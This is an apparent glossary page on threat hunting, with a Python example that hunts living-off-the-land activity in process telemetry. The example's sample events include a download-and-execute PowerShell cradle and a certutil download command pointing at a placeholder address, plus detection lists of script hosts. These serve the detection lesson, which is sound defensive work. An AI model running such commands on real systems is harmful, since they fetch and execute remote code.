// THREAT DETECTION AND DATA PRIVACY TERM
Threat Hunting
Threat hunting is a proactive cybersecurity practice where defenders actively search through networks and systems to detect and isolate advanced threats that have bypassed automated security solutions. Unlike traditional security measures that react to alerts, threat hunting assumes a breach has occurred or is in progress, seeking out hidden malicious activity.

TECHNICAL DEFINITION
Threat hunting is a proactive, investigative methodology in which security analysts search, manually or semi-automatically, across enterprise networks, endpoints, and cloud environments for evidence of threats that automated tools have not detected, including advanced persistent threats (APTs) and post-exploitation activity from zero-day exploits. Hunts are driven by hypotheses formed from contextual threat intelligence, behavioral analysis, and anomaly detection, and they succeed by finding the traces that signature- and rule-based tools missed.
BACKGROUND
The Cybersecurity and Infrastructure Security Agency (CISA), headquartered in Arlington, Virginia, is a component of the United States Department of Homeland Security (DHS) responsible for cybersecurity and infrastructure protection across all levels of government, coordinating cybersecurity programs with U.S. states, and improving the government's cybersecurity protections against private and nation-state hackers.
SYNONYMS & ALIASES
- Proactive defense
- Cyber hunting
- Security hunting
- Intrusion hunting
- Adversary pursuit
- Cyber threat hunting
USAGE NOTE
Threat hunting is crucial for detecting fileless and 'living off the land' attacks, which run through legitimate, signed system binaries (PowerShell, certutil, rundll32 and the like) and therefore evade signature-based defenses and default SIEM correlation rules. It requires analysts who know what normal looks like on their own estate, rich telemetry (process creation, network, authentication), and threat intelligence from which to form hypotheses.
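The definition and usage note above describe hunting in the abstract. As an added example (not code from this page or from any vendor it lists), here is a small hypothesis-driven hunt in Python over constructed process-creation events: it looks for the living-off-the-land chain the usage note describes (an Office document spawning a script host, an encoded PowerShell command, certutil used as a downloader), stacks parent/child process pairs by frequency to surface anomalies, and pivots to the affected host to scope the intrusion. The record field names, host names, user names and sample events are assumptions; the ATT&CK technique IDs are real.

```python
"""Hypothesis-driven hunt over process-creation telemetry.

Added example, not taken from the page or from any vendor product. It
assumes a simplified record shape {host, user, parent, image, cmdline}
(field names are an assumption; Sysmon Event ID 1 and most EDRs expose
equivalents) and uses constructed sample events, not real data.
"""
import base64
import re
from collections import Counter

# Constructed sample: the encoded PowerShell payload a malicious document
# might launch (RFC 5737 documentation address, nothing real is contacted).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()

# Constructed sample telemetry: mostly routine activity, plus one
# living-off-the-land chain on ws02 that no file signature would flag.
EVENTS = [
    {"host": "ws01", "user": "alice", "parent": "explorer.exe", "image": "winword.exe",
     "cmdline": 'winword.exe /n "C:\\Users\\alice\\report.docx"'},
    {"host": "ws02", "user": "bob", "parent": "explorer.exe", "image": "outlook.exe",
     "cmdline": "outlook.exe"},
    {"host": "ws01", "user": "SYSTEM", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws02", "user": "SYSTEM", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws03", "user": "SYSTEM", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "ws04", "user": "admin", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"host": "ws02", "user": "bob", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENC},
    {"host": "ws02", "user": "bob", "parent": "powershell.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/up.dat "
                "C:\\Users\\Public\\up.dat"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_office_child_processes(events):
    """Hypothesis: a document viewer has no business launching a script host."""
    return [e for e in events
            if e["parent"].lower() in OFFICE_APPS
            and e["image"].lower() in SUSPICIOUS_CHILDREN]


def hunt_certutil_abuse(events):
    """Hypothesis: certutil fetching URLs or decoding files is a LOLBin downloader."""
    return [e for e in events if e["image"].lower() == "certutil.exe"
            and re.search(r"(?i)-urlcache|-decode", e["cmdline"])]


def stack_parent_child(events, max_count=1):
    """Frequency stacking: parent/child pairs seen at most max_count times.
    Rarity is a triage cue, not a verdict; benign one-offs land here too."""
    counts = Counter((e["parent"].lower(), e["image"].lower()) for e in events)
    return sorted((pair, n) for pair, n in counts.items() if n <= max_count)


def pivot(events, host):
    """Once a hypothesis hits, pull the whole host timeline to scope the intrusion."""
    return [e for e in events if e["host"] == host]


def run_hunt(events):
    """Run each hypothesis and tag hits with the ATT&CK technique they suggest."""
    findings = []
    for e in hunt_office_child_processes(events):
        findings.append({"host": e["host"], "technique": "T1204.002",
                         "why": f"{e['parent']} spawned {e['image']}"})
    for e in events:
        decoded = decode_encoded_powershell(e["cmdline"])
        if decoded is not None:
            findings.append({"host": e["host"], "technique": "T1059.001",
                             "why": "encoded PowerShell decodes to: " + decoded})
    for e in hunt_certutil_abuse(events):
        findings.append({"host": e["host"], "technique": "T1105", "why": e["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in run_hunt(EVENTS):
        print(f"{f['host']}  {f['technique']}  {f['why']}")
    for pair, n in stack_parent_child(EVENTS):
        print(f"rare chain ({n}x): {pair[0]} -> {pair[1]}")
    print(f"events to review on ws02: {len(pivot(EVENTS, 'ws02'))}")
```

Note the division of labour: the three hypothesis functions encode knowledge of adversary tradecraft, while `stack_parent_child` encodes nothing except "rare is interesting", so it also surfaces benign one-offs such as the admin's backup script; the analyst triages that list rather than alerting on it. In a real hunt the same queries would be run against EDR or SIEM data over a baseline window, and every confirmed hit would be turned into a detection rule so the next occurrence is caught automatically.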
DEVELOPERS
Organizations developing technology related to Threat Hunting.
A leader in incident response and threat intelligence, Mandiant offers advanced threat hunting services and technology platforms designed to proactively identify and neutralize sophisticated cyber threats.
Known for its Falcon platform, CrowdStrike provides endpoint detection and response (EDR) and extended detection and response (XDR) solutions with robust threat hunting capabilities, leveraging AI and threat intelligence.
Microsoft, through Microsoft Defender XDR, integrates threat hunting tools, AI-driven insights, and automation to help security teams proactively search for threats across their entire digital estate.
Palo Alto Networks' Cortex XDR platform is an extended detection and response solution that provides comprehensive threat hunting capabilities, correlating data from various sources to uncover stealthy attacks.
Another vendor offers an AI-powered XDR platform designed for autonomous threat detection and assisted threat hunting, providing visibility and automated response capabilities across endpoints, cloud, and identity.
Splunk Enterprise Security (ES) is a leading SIEM platform widely used for aggregating and analyzing security data, providing the foundational insights and tools necessary for effective proactive threat hunting.
Another vendor provides an AI-driven XDR platform that focuses on correlation and behavioral analytics to enable efficient threat hunting, helping security analysts detect and respond to complex attacks.
Another vendor offers open-source and commercial security solutions, including SIEM and endpoint protection, that enable data-driven threat hunting by providing powerful search, analytics, and visualization capabilities over security data.
MITRE develops frameworks such as MITRE ATT&CK, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations; it gives hunters a shared vocabulary for forming hypotheses and for mapping what they find to known adversary behavior.